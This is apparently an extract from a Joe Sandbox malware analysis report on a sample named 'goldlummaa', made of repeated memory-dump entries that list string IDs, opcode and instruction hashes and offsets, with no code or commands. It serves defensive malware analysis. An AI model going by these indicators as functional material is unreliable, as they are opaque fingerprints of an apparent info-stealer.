                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: BE$de
                                                                                                                  • API String ID: 0-1272349043
                                                                                                                  • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                  • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                  • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                  • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AzB$`rB
                                                                                                                  • API String ID: 0-365317308
                                                                                                                  • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                  • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                  • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                  • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AzB$`rB
                                                                                                                  • API String ID: 0-365317308
                                                                                                                  • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                  • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                  • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                  • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: c$
                                                                                                                  • API String ID: 0-2516980088
                                                                                                                  • Opcode ID: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                                                                                  • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                  • Opcode Fuzzy Hash: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                                                                                  • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: A67H
                                                                                                                  • API String ID: 0-3389657328
                                                                                                                  • Opcode ID: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                                                                                  • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                  • Opcode Fuzzy Hash: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                                                                                  • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ,)*k
                                                                                                                  • API String ID: 2994545307-1228391949
                                                                                                                  • Opcode ID: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
                                                                                                                  • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                  • Opcode Fuzzy Hash: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
                                                                                                                  • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: m
                                                                                                                  • API String ID: 0-3775001192
                                                                                                                  • Opcode ID: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                                                                                  • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                  • Opcode Fuzzy Hash: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                                                                                  • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  • API String ID: 0-1505114982
                                                                                                                  • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                  • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                  • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                  • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &#
                                                                                                                  • API String ID: 0-1789715784
                                                                                                                  • Opcode ID: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
                                                                                                                  • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                  • Opcode Fuzzy Hash: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
                                                                                                                  • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  • API String ID: 0-1505114982
                                                                                                                  • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                  • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                  • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                  • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                  Strings
                                                                                                                  • 277DB6F22143AFD2F9F1B7136A1E0C5E, xrefs: 004097D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 277DB6F22143AFD2F9F1B7136A1E0C5E
                                                                                                                  • API String ID: 0-2259407529
                                                                                                                  • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                  • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                                                                                  • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                  • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ~
                                                                                                                  • API String ID: 0-1707062198
                                                                                                                  • Opcode ID: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
                                                                                                                  • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                  • Opcode Fuzzy Hash: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
                                                                                                                  • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RpB
                                                                                                                  • API String ID: 0-664042118
                                                                                                                  • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                  • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                  • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                  • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: d1
                                                                                                                  • API String ID: 0-4211392460
                                                                                                                  • Opcode ID: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
                                                                                                                  • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                  • Opcode Fuzzy Hash: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
                                                                                                                  • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • Opcode ID: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
                                                                                                                  • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                  • Opcode Fuzzy Hash: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
                                                                                                                  • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 0-123907689
                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                  • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                  • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: w
                                                                                                                  • API String ID: 0-2991200456
                                                                                                                  • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                  • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                  • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                  • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • Opcode ID: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
                                                                                                                  • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                  • Opcode Fuzzy Hash: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
                                                                                                                  • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
                                                                                                                  • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                  • Opcode Fuzzy Hash: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
                                                                                                                  • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                  • Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
                                                                                                                  • Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                  • Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
                                                                                                                  • Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
                                                                                                                  • Opcode Fuzzy Hash: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
                                                                                                                  • Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                  • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                  • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                  • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                  • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                  • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                  • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                                                                                  • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                  • Opcode Fuzzy Hash: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                                                                                  • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                  • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                  • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                  • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                  • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                  • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                  • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                  • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                  • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                  • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                  • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                  • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                  • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                  • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                  • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                  • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                  • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                  • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                  • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
